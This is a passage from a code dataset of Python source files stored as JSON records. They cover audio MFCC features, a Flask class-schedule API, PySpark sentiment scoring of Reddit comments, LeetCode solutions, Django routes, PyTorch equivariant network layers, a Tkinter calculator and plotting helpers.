sample_rate):\n\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the 
linear scale spectrograms into the mel-scale.\n    num_spectrogram_bins = stfts.shape[-1]\n    lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n    linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n        num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n        upper_edge_hertz)\n    mel_spectrograms = tf.tensordot(\n        spectrograms, linear_to_mel_weight_matrix, 1)\n    mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n        linear_to_mel_weight_matrix.shape[-1:]))\n\n    # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n    log_mel_spectrograms = tf.math.log(mel_spectrograms + 1e-6)\n    # Compute MFCCs from log_mel_spectrograms and take the first 13.\n    mfccs = tf.signal.mfccs_from_log_mel_spectrograms(\n        log_mel_spectrograms)[..., :13]\n    mfccs = mfccs[..., tf.newaxis]\n\n    return mfccs\n\n# Function to display spectrogram\ndef plot_spectrogram(spectrogram, ax):\n    if len(spectrogram.shape) > 2:\n        assert len(spectrogram.shape) == 3\n        spectrogram = np.squeeze(spectrogram, axis=-1)\n    # Convert the frequencies to log scale and transpose, so that the time is\n    # represented on the x-axis (columns).\n    # Add an epsilon to avoid taking a log of zero.\n    log_spec = np.log(spectrogram.T + np.finfo(float).eps)\n    height = log_spec.shape[0]\n    width = log_spec.shape[1]\n    X = np.linspace(0, np.size(spectrogram), num=width, dtype=int)\n    Y = range(height)\n    ax.pcolormesh(X, Y, log_spec)\n\n# Create Spectrogram dataset from audio files\ndef make_features_ds(ds, sr):\n    return ds.map(\n        map_func=lambda audio,label: (get_features(audio, sr), label),\n        num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Create Spectrogram dataset from audio files\ndef make_melspec_ds(ds, sr):\n    return ds.map(\n        map_func=lambda audio,label: (get_melspec(audio, sr), label),\n        num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_mfcc_ds(ds, sr):\n    return ds.map(\n        map_func=lambda audio,label: (get_mfcc(audio, sr), label),\n        num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_spec_ds(ds):\n    return ds.map(\n        map_func=lambda audio,label: (get_spectrogram(audio), label),\n        num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Define function to check if file is in WAV format\ndef is_wav(filename):\n    '''\n    Checks if files are .wav files\n    Utility used when converting WAV files to PNG files\n    '''\n    return filename.split('.')[-1] == 'wav'\n\ndef opus_to_wav(clips_path, save_path):\n    for subdir in os.listdir(clips_path):\n        word_path = os.path.join(clips_path, subdir)\n        sp = os.path.join(save_path, clips_path[:len(clips_path) - 7][-2:] + \"-\" + subdir)\n        os.makedirs(sp)\n        print(\"Converting OPUS to WAV for the \\\"\" + subdir + \"\\\" label\")\n        print('++++++++++++++++++++++++++++++++++')\n        for recording in os.listdir(word_path):\n            recording_path = os.path.join(word_path, recording)\n            # splitext, not rstrip: rstrip(\".opus\") strips a character set, not the suffix\n            wav_file = os.path.join(sp, os.path.splitext(recording)[0] + \".wav\")\n            if not os.path.exists(wav_file):\n                os.system(\"ffmpeg -i \\\"\" + recording_path + \"\\\" \\\"\" + wav_file + \"\\\"\")\n\ndef trim_audio(wav_file_loc):\n    y,sr=lb.load(wav_file_loc) #load the file\n    trim_file, index = lb.effects.trim(y) # Remove leading and trailing silence\n    return trim_file, sr","repo_name":"chrispvasquez/ML-Commands","sub_path":"DLHelperFunctions.py","file_name":"DLHelperFunctions.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15620276340","text":"# File 
name: app.py\r\n# Author: Benjamin Corn\r\n# Date created: 2/20/2016\r\n# Date last modified: 2/25/2016\r\n# Python Version: 3.0\r\n\r\nfrom flask import Flask\r\nfrom flask.ext.sqlalchemy import SQLAlchemy\r\nfrom flask.ext.restless import APIManager\r\n\r\n# Starting new Flask app\r\napp = Flask(__name__)\r\n\r\n# Starting new sqlite database connection\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classdata.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n# RESTful API database model class\r\nclass Class(db.Model):\r\n\tid = db.Column(db.Integer, primary_key=True)\r\n\tclassnum = db.Column(db.Text)\r\n\tclassname = db.Column(db.Text)\r\n\tprofessor = db.Column(db.Text)\r\n\tclasstype = db.Column(db.Text)\r\n\tseats = db.Column(db.INT)\r\n\tbldgcode = db.Column(db.Text)\r\n\troomcode = db.Column(db.Text)\r\n\tclassdays = db.Column(db.Text)\r\n\tstarttime = db.Column(db.Text)\r\n\tendtime = db.Column(db.Text)\r\n\r\n# Push all structures to database\r\ndb.create_all()\r\n\r\n# Creating APIManager from restless extension\r\nmanager = APIManager(app, flask_sqlalchemy_db=db)\r\n\r\n# Defining valid HTTP request methods\r\nclass_blueprint = manager.create_api(Class, methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])\r\n\r\n# Run the Flask app\r\nif __name__ == \"__main__\":\r\n\tapp.run()\r\n","repo_name":"bencorn/BU-Scheduling-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73385664692","text":"from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import from_unixtime\nfrom pyspark.sql.functions import dayofmonth, year, month, col, udf\nfrom pyspark.sql.types import DoubleType\nfrom pyspark.sql import DataFrameWriter\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport string\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfile_name = \"RC_2005-12.bz2\"\nfile_path = \"s3a://redditcommentsbz2/\" + file_name\n\n# create Spark context\nmaster = os.getenv('master_host')\nsc = SparkContext(master, 'preprocess')\nsqlContext = SQLContext(sc)\n\n# read in data\n\ndata = sqlContext.read.json(file_path).select('created_utc', 'controversiality', 'link_id', 'score', 'body', 'author', 'subreddit', 'id')\\\n    .withColumnRenamed('created_utc', 'time').withColumnRenamed('link_id','post_id').withColumnRenamed('body','comment').withColumnRenamed('id','comment_id') # rename columns\ndata = 
data.filter(~col('comment').isin(['[deleted]', '[removed]'])).filter(~col('author').isin(['[deleted]']))\ndata = data.withColumn('time', from_unixtime(data.time, format='yyyy-MM-dd HH:mm:ss')) # convert unixtime to datetime\ndf = data.withColumn('year', year(data.time)).withColumn('month', month(data.time)).withColumn('day', dayofmonth(data.time)) # calculate year, month, day\n\n# Create sentiment score for each comment\nsid = SentimentIntensityAnalyzer()\n\ndef remove_punctuation(x):\n    \"\"\"\n    Removes punctuation from comment to calculate sentiment score\n    :param: x, str, reddit comment\n    :return: str, comment without punctuation\n    \"\"\"\n    punc='\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~'\n    for ch in punc:\n        x = x.replace(ch, '')  # accumulate removals; reassigning from the original string would only strip the last character\n    return x\n\ndef vader(x):\n    \"\"\"\n    Calculates sentiment score of comment.\n    :param: x, str, reddit comment with no punctuation\n    :return: ss, double, sentiment score\n    \"\"\"\n    ss = sid.polarity_scores(x)['compound']\n    return ss\n\n# apply udf so spark can interpret the functions\nnoPunctuation = udf(lambda x: remove_punctuation(x))\nsentimentScore = udf(lambda x: vader(x))\n\ndf = df.withColumn('clean_comment', noPunctuation(df.comment)) # remove punctuation from comment\ndf = df.withColumn('sentiment', sentimentScore(df.clean_comment)) # calculate sentiment score\ndf = df.withColumn(\"sentiment\", df[\"sentiment\"].cast(\"double\"))\n\n# CREATE TABLES\n\n# create comments table\ncomments = df.select('time', 'year','month','day','post_id','comment_id', 'author', 'comment', 'controversiality', 'score', 'sentiment', 'subreddit')\ncomments.show()\n# create posts table, containing posts and the percentage of negative comments\n#neg_comments = comments.filter(\"sentiment <= -0.7\").groupby('post_id').count()\n#neg_comments = neg_comments.withColumnRenamed(\"count\",\"num_neg_comments\")\n#num_comments_per_post = comments.groupby('post_id').count()\n#num_comments_per_post = num_comments_per_post.withColumnRenamed(\"count\", \"total_comments\")\n#posts = neg_comments.join(num_comments_per_post, 'post_id')\n#posts = posts.withColumn(\"% neg comments\", func.round(neg_comments[\"num_neg_comments\"]/num_comments_per_post[\"total_comments\"],2))\n#posts.show()\n# create user_history table\n#user_avg = df1.select('author','controversiality', 'score', 'sentiment').groupby('author').mean()\n#user_avg = user_avg.withColumnRenamed('avg(controversiality)','avg_controversiality').withColumnRenamed('avg(score)','avg_score').withColumnRenamed('avg(sentiment)','avg_sentiment')\n#user_comments = df1.groupby('author').count()\n#user_comments = user_comments.withColumnRenamed('count','num_comments')\n#user_history = user_avg.join(user_comments, 'author')\n#print('USER HISTORY')\n#user_history.show()\n\n# save file\n#comments.repartition(10).write.option('maxRecordsPerFile',100000).mode('overwrite').csv('/reddit_data/')\n\n\n# WRITE TO POSTGRES\ndb_host = os.getenv(\"db_host\")\ndb_user = os.getenv(\"db_user\")  # added: db_user is referenced below but was never defined (env var name assumed to match the others)\ndb_password = os.getenv(\"db_password\")\ndb_port = os.getenv(\"db_port\")\ndb_name = os.getenv(\"db_name\")\ndb_url = \"jdbc:postgresql://\" + db_host + ':' + str(db_port) + '/' + db_name\n\ncomments_table_name = \"comments\"\nposts_table_name = \"posts\"\nproperties = {\n    \"driver\": \"org.postgresql.Driver\",\n    \"user\": db_user,\n    \"password\": db_password}\nwrite_mode = 'append'\ncomments.write.jdbc(url = db_url, table = comments_table_name, mode = write_mode, properties = properties)\n#posts.write.jdbc(url = db_url, table = posts_table_name, mode = write_mode, properties = 
properties)\n\n","repo_name":"avenacheng/ModDash","sub_path":"data-processing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18405660969","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n\nclass Solution:\n # bucket. Time: O(n)\n # https://www.youtube.com/watch?v=EYFcQRwcqk0&t=133s\n def topKFrequent(self, A: List[int], k: int) -> List[int]:\n n=len(A)\n di=Counter(A)\n bucket=[[] for _ in range(n+1)]\n for x in di:\n bucket[di[x]].append(x)\n res=[]\n for i in range(n,-1,-1):\n while k and bucket[i]:\n res.append(bucket[i].pop())\n k-=1\n return res\nclass Solution2:\n # heap\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n pq = []\n di = defaultdict(int)\n for num in nums:\n di[num]+=1\n\n for num in di:\n if len(pq)<k:\n heappush(pq,(di[num],num))\n else:\n lowest_freq,x = pq[0]\n if di[num]>lowest_freq:\n heappop(pq)\n heappush(pq,(di[num],num))\n res = [x[1] for x in pq]\n return res\n\n# quick select\nclass Solution3:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n count = Counter(nums)\n unique = list(count.keys())\n\n def partition(left, right, pivot_index) -> int:\n pivot_frequency = count[unique[pivot_index]]\n # 1. move pivot to end\n unique[pivot_index], unique[right] = unique[right], unique[pivot_index]\n\n # 2. move all less frequent elements to the left\n i = left - 1\n for j in range(left, right):\n if count[unique[j]] < pivot_frequency:\n i += 1\n unique[i], unique[j] = unique[j], unique[i]\n\n # 3. 
move pivot to its final place\n unique[right], unique[i+1] = unique[i+1], unique[right]\n\n return i + 1\n\n def quickselect(left, right, k_smallest) -> None:\n \"\"\"\n Sort a list within left..right till kth less frequent element\n takes its place.\n \"\"\"\n # base case: the list contains only one element\n if left == right:\n return\n\n # select a random pivot_index\n pivot_index = random.randint(left, right)\n\n # find the pivot position in a sorted list\n pivot_index = partition(left, right, pivot_index)\n\n # if the pivot is in its final sorted position\n if k_smallest == pivot_index:\n return\n # go left\n elif k_smallest < pivot_index:\n quickselect(left, pivot_index - 1, k_smallest)\n # go right\n else:\n quickselect(pivot_index + 1, right, k_smallest)\n\n n = len(unique)\n # kth top frequent element is (n - k)th less frequent.\n # Do a partial sort: from less frequent to the most frequent, till\n # (n - k)th less frequent element takes its place (n - k) in a sorted array.\n # All element on the left are less frequent.\n # All the elements on the right are more frequent.\n quickselect(0, n - 1, n - k)\n # Return top k frequent elements\n return unique[n - k:]\n\n\nclass mycase(unittest.TestCase):\n def test01(self):\n self.assertEqual([1,2],get_sol().topKFrequent([1,1,1,2,2,3], 2))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc347.py","file_name":"lc347.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36707665073","text":"from . import views\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom moonbling import settings\n\nurlpatterns = [\n path('', views.product_list, name='main'),\n path('shop/', views.product_list, name='product_list'),\n path('shop/<str:category_slug>/', views.product_list, name='product_list_by_category'),\n path('shop/<str:slug>/<int:product_id>', views.product_detail, name='product_detail'),\n path('shop/about', views.about, name='about'),\n path('shop/contacts', views.contacts, name='contacts'),\n path('product_update/<int:product_id>', views.product_update, name='product_update'),\n path('admin_logout/', views.admin_logout, name='admin_logout')\n ]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Melikhov-p/moonbling","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"45677948805","text":"import torch\r\nfrom einops import rearrange\r\nfrom torch import nn\r\n\r\nfrom protein_learning.networks.common.helpers.torch_utils import fused_gelu as NONLIN\r\nfrom protein_learning.networks.common.utils import default\r\nfrom protein_learning.networks.common.invariant.units import FeedForward\r\n\r\n\r\nclass FiberWeightedOut(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n fiber,\r\n nonlin=NONLIN,\r\n eps=1e-6, # TODO: changed from 1e-12\r\n include_order_stats=False,\r\n ):\r\n super().__init__()\r\n self.fiber = fiber\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.include_order_stats = include_order_stats\r\n dim0, dim1 = fiber.dims[0] + fiber.dims[1], fiber.dims[1]\r\n if include_order_stats:\r\n dim0 += 2 * fiber.dims[1]\r\n mid = (dim0 + dim1) // 2\r\n self.weight_net = nn.Sequential(\r\n nn.Linear(dim0, mid),\r\n nonlin(),\r\n 
nn.LayerNorm(mid),\r\n            nn.Linear(mid, mid),\r\n            nonlin(),\r\n            nn.LayerNorm(mid),\r\n            nn.Linear(mid, dim1),\r\n        )\r\n\r\n    def forward(self, features):\r\n        output = {}\r\n        norm = torch.norm(features['1'], dim=-1)\r\n        std, mean = torch.std_mean(norm, dim=1)\r\n        rel_norm = (norm - mean) / (std + self.eps)\r\n        if self.include_order_stats:\r\n            m, s = mean.unsqueeze(1), std.unsqueeze(1)\r\n            m, s = m.expand_as(rel_norm), s.expand_as(rel_norm)\r\n            inp = torch.cat((features['0'].squeeze(-1), rel_norm, m, s), dim=-1)\r\n        else:\r\n            inp = torch.cat((features['0'].squeeze(-1), rel_norm), dim=-1)\r\n        weights = self.weight_net(inp).unsqueeze(-1)\r\n        output['0'] = features['0']\r\n        output['1'] = torch.sum(features['1'] * weights, dim=-2, keepdim=True)\r\n        return output\r\n\r\n\r\nclass WeightedOut(nn.Module):\r\n    def __init__(\r\n            self,\r\n            coord_dim,\r\n            feat_dim,\r\n            coord_dim_out=1,\r\n            nonlin=NONLIN,\r\n            eps=1e-5,\r\n            include_norms=True,\r\n            n_hidden=1,\r\n    ):\r\n        super().__init__()\r\n        self.nonlin = nonlin\r\n        self.eps = eps\r\n        self.transform = nn.ModuleDict()\r\n        self.coord_dim_out = coord_dim_out\r\n        self.coord_dim = coord_dim\r\n        dim_in = coord_dim + feat_dim if include_norms else feat_dim\r\n        mid, dim_out = max(128, dim_in), coord_dim * coord_dim_out\r\n        self.weight_net = FeedForward(dim_in, mid, dim_out, n_hidden=n_hidden)\r\n\r\n    def forward(self, coords, feats, return_feats=True):\r\n        norm = torch.norm(coords, dim=-1)\r\n        std, mean = torch.std_mean(norm, dim=1)\r\n        rel_norm = (norm - mean) / (std + self.eps)\r\n        inp = torch.cat((feats.squeeze(-1), rel_norm), dim=-1)\r\n        weights = self.weight_net(inp)\r\n        weight_shape = (*weights.shape[:-1], self.coord_dim, self.coord_dim_out, 1)\r\n        weights = weights.view(weight_shape)\r\n        coords = coords.unsqueeze(-2)\r\n        transformed_coords = torch.sum(coords * weights, dim=-3)\r\n\r\n        if return_feats:\r\n            return transformed_coords, feats\r\n        else:\r\n            return transformed_coords\r\n\r\n\r\nclass RadialFunc(nn.Module):\r\n    \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n    def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=None, nonlin=NONLIN,\r\n                 hidden_layer: bool = True, compress=False, dropout=0.0):\r\n        super().__init__()\r\n        self.num_freq = num_freq\r\n        self.in_dim = in_dim\r\n        self.edge_dim = default(edge_dim, 0)\r\n        mid_dim = default(mid_dim, edge_dim)\r\n        self.out_dim = out_dim\r\n        bias = dropout > 0\r\n\r\n        layer = lambda i, o, norm=True: nn.ModuleList([\r\n            nn.Linear(i, o),\r\n            nn.LayerNorm(o) if norm else nn.Identity(),  # instantiate: the bare nn.Identity class would break the ModuleList\r\n            nonlin(),\r\n            nn.Dropout(dropout) if dropout > 0 else nn.Identity()\r\n        ])\r\n        if not compress:\r\n            self.net = nn.Sequential(\r\n                *layer(edge_dim, mid_dim),\r\n                *(layer(mid_dim, mid_dim) if hidden_layer else [nn.Identity()]),  # a bare module cannot be star-unpacked\r\n                nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n            )\r\n        else:\r\n            mid_dim, code_dim = edge_dim // 2, edge_dim // 4\r\n            self.net = nn.Sequential(\r\n                *layer(edge_dim, mid_dim, norm=True),\r\n                *layer(mid_dim, code_dim, norm=True),\r\n                *layer(code_dim, mid_dim, norm=True),\r\n                nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n            )\r\n\r\n    def forward(self, x):\r\n        y = self.net(x)\r\n        return rearrange(y, '... (o i f) -> ... 
o () i () f', i=self.in_dim, o=self.out_dim)\r\n\r\n\r\nclass RadialKernel(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=128):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.out_dim = out_dim\r\n self.bin_embedding = nn.Embedding(34, num_freq * in_dim * out_dim)\r\n self._dist_bins = torch.arange(34)\r\n\r\n def dist_bins(self, device):\r\n if self._dist_bins.device != device:\r\n self._dist_bins = self._dist_bins.to(device)\r\n return self._dist_bins\r\n\r\n def forward(self, dists):\r\n print('in radial kernel')\r\n kernels = self.bin_embedding(self.dist_bins(dists.device))\r\n actual_bins = torch.round(torch.clamp((dists - 2.4) / 0.4, 0, 33)).long()\r\n kernels = kernels[actual_bins].squeeze(-2)\r\n return rearrange(kernels, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/networks/common/equivariant/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"20139465408","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/maximum-level-sum-of-a-binary-tree/\n\nReturn the smallest level X such that the \nsum of all the values of nodes at level X is maximal.\n\"\"\"\n\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n def dfSearch(root: TreeNode, level: int, sums: List[int]=[]):\n if not root:\n return sums\n else:\n if level >= len(sums):\n sums.append(0)\n sums[level] += root.val\n dfSearch(root.left, level + 1, sums)\n dfSearch(root.right, level + 1, sums)\n return sums\n\n sums = dfSearch(root, 0)\n return sums.index(max(sums)) + 1","repo_name":"V-Wong/LeetCode","sub_path":"Tree/max_level_sum.py","file_name":"max_level_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24220268211","text":"from tkinter import *\r\n\r\ndef evaluate(expression):\r\n operators = [\r\n \"+\",\r\n \"-\",\r\n \"x\",\r\n \"/\",\r\n \"^\"\r\n ]\r\n if expression.find(\"(\") != -1:\r\n if expression.count(\"(\") != expression.count(\")\"):\r\n return \"Error: syntax\"\r\n else:\r\n for x in range(expression.count(\"(\") + 1):\r\n openPar = expression.rfind(\"(\")\r\n closedPar = expression.find(\")\")\r\n \r\n\r\n\r\nbutton_values = [\r\n {\"row\": 1, \"col\": 0, \"value\": \"(\"},\r\n {\"row\": 1, \"col\": 1, \"value\": \")\"},\r\n {\"row\": 1, \"col\": 2, \"value\": \"AC\"},\r\n {\"row\": 1, \"col\": 3, \"value\": \"**\"},\r\n \r\n {\"row\": 2, \"col\": 0, \"value\": \"7\"},\r\n {\"row\": 2, \"col\": 1, \"value\": \"8\"},\r\n {\"row\": 2, \"col\": 2, \"value\": \"9\"},\r\n {\"row\": 2, \"col\": 3, \"value\": \"/\"},\r\n\r\n {\"row\": 3, \"col\": 0, \"value\": \"4\"},\r\n {\"row\": 3, \"col\": 1, \"value\": \"5\"},\r\n {\"row\": 3, \"col\": 2, \"value\": \"6\"},\r\n {\"row\": 3, \"col\": 3, \"value\": \"*\"},\r\n\r\n {\"row\": 4, \"col\": 0, \"value\": \"1\"},\r\n {\"row\": 4, \"col\": 1, \"value\": \"2\"},\r\n {\"row\": 4, \"col\": 2, \"value\": \"3\"},\r\n {\"row\": 4, \"col\": 3, \"value\": \"-\"},\r\n\r\n {\"row\": 5, \"col\": 0, \"value\": \"0\"},\r\n {\"row\": 5, \"col\": 1, \"value\": \".\"},\r\n {\"row\": 5, \"col\": 2, \"value\": \"=\"},\r\n {\"row\": 5, \"col\": 3, \"value\": \"+\"},\r\n]\r\n\r\nUSING_RPI = 
False\r\n\r\nclass MainGui(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n if USING_RPI:\r\n master.attributes(\"-fullscreen\", True)\r\n self.setupGui()\r\n\r\n def makeButton(self, row, col, value):\r\n bg_color = \"#cccccc\"\r\n if value == \"=\":\r\n bg_color = \"blue\"\r\n\r\n button = Button(\r\n self,\r\n font=(\"Helvetica\", 20),\r\n text=value,\r\n bg=bg_color,\r\n highlightbackground=bg_color,\r\n borderwidth=0,\r\n highlightthickness=0,\r\n width=5,\r\n activebackground=\"white\",\r\n command= lambda : self.handle_button_press(value)\r\n )\r\n button.grid(row=row, column=col, sticky=NSEW)\r\n\r\n def setupGui(self):\r\n self.display = Label(self, text=\"\", anchor=E, bg=\"white\", fg=\"black\", height=1, font=(\"Helvetica\", 30))\r\n self.display.grid(row=0, column=0, columnspan=4, sticky=NSEW)\r\n\r\n for row in range(6):\r\n Grid.rowconfigure(self, row, weight=1)\r\n for col in range(4):\r\n Grid.columnconfigure(self, col, weight=1)\r\n for button in button_values:\r\n self.makeButton(button[\"row\"], button[\"col\"], button[\"value\"])\r\n \r\n self.pack(fill=BOTH, expand=1)\r\n self.errored = False\r\n self.calculated = False\r\n\r\n def handle_button_press(self, buttonVal):\r\n display = self.display[\"text\"]\r\n clear = buttonVal == \"AC\"\r\n evaluate = buttonVal == \"=\"\r\n numeric = buttonVal in list(\"0123456789\")\r\n\r\n if clear:\r\n self.display[\"text\"] = \"\"\r\n return\r\n if evaluate:\r\n try:\r\n result = str(eval(display))\r\n self.display[\"text\"] = result\r\n self.calculated = True\r\n except:\r\n self.display[\"text\"] = \"ERROR\"\r\n self.errored = True\r\n return\r\n # clear the display after an error or a finished calculation before appending new input\r\n if self.errored and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.errored = False\r\n if self.calculated and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.calculated = False\r\n self.display[\"text\"] += buttonVal\r\n return\r\n\r\nwindow = Tk()\r\nwindow.title(\"Calculator\")\r\nr = MainGui(window)\r\nwindow.mainloop()\r\n\r\n\r\n\r\n \r\n","repo_name":"DanIsHere64/FunWithGit","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71198557173","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n###\n# Created Date: Thursday, August 22nd 2019, 9:25:01 am\n# Author: Charlene Leong leongchar@myvuw.ac.nz\n# Last Modified: Fri Sep 13 2019\n###\n\nimport numpy as np\nimport torch\n\nimport sklearn.metrics\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(font_scale=2)\n\nSEED = 489\n\ndef plt_scatter(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n ax = plt.subplot()\n ax.tick_params(axis='both', labelsize=10)\n \n if len(colors) == 0:\n plt.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n plt.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n plt.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext = 
np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n \n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name)\n\ndef plt_scatter_3D(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n\n fig = plt.figure()\n ax = Axes3D(fig)\n \n if len(colors) == 0:\n ax.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n ax.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n ax.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext, ztext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, ztext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n\n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name) \n \ndef plt_confusion_matrix(y_pred, y_target, output_dir, pltshow=False):\n confusion_matrix = sklearn.metrics.confusion_matrix(y_target, y_pred)\n\n plt.figure(figsize=(16, 14))\n sns.heatmap(confusion_matrix, annot=True, fmt='d', annot_kws={'size': 20})\n # plt.title('Confusion matrix', fontsize=10)\n plt.ylabel('True label', fontsize=20)\n plt.xlabel('Clustering label', fontsize=20)\n plt.savefig(output_dir+'/confusion_matrix.png', bbox_inches='tight')\n\n if pltshow:\n plt.show()\n\n return plt.imread(output_dir+'/confusion_matrix.png'), 'confusion_matrix.png'\n\n\ndef plt_clusters(output_dir, data, algorithm, args, kwds):\n fig = plt.figure()\n # start_time = time.time()\n labels = algorithm(*args, **kwds).fit_predict(data)\n # end_time = time.time()\n ax = plt.subplot()\n # ax.axis('tight')\n ax.tick_params(axis='both', labelsize=10)\n # labels_list = np.unique(labels)\n # palette = np.array(sns.color_palette('hls', len(labels_list)))\n palette = sns.color_palette('hls')\n colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n plt.scatter(data.T[0], data.T[1], c=colors, s=8, linewidths=1)\n # frame = plt.gca()\n # frame.axes.get_xaxis().set_visible(False)\n # frame.axes.get_yaxis().set_visible(False)\n plt.title('Clusters found by {}'.format(str(algorithm.__name__)), fontsize=14)\n #plt.text(-0.5, 0.7, 'Clustering took {:.2f} s'.format(end_time - start_time), fontsize=14)\n plt.savefig(output_dir)\n print ( '\\n saved image ', output_dir)\n plt.close(fig)\n return plt.imread(output_dir)\n\n\n ","repo_name":"charleneleong-ai/kun","sub_path":"models/utils/plt.py","file_name":"plt.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10036489838","text":"import cv2\r\nimport numpy as 
